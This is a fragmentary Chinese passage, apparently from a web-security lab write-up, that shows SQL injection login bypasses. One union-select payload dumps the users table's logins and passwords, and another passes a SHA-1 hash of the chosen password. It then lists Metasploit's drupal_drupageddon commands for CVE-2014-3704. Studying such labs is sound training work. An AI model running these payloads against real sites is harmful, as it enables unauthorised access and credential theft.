, 需要注入的联合查询字段(顺序为3)与输入的密码相等
比如, 注入的联合查询为:
' union select 1,2,3,4,5,6,7,8,9 #
recordset从数据库中搜索就有了返回值...#
密码 : 3
users表的所有字段
用户名: ' union select 1,database(),"77de68daecd823babbb58edb1c8e14d7106e83bb"...",4,(select group_concat('~',login,'~',password) from users),6,7,8,9 #
密码 : 3
Medium&High
查看源码发现对用户名和密码进行了相应的防护...使用CVE-2014-3704对应的攻击模块:
use exploit/multi/http/drupal_drupageddon
设置Drupal网站路径:
set targeturi /drupal...发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/190360.html原文链接:https://javaforall.cn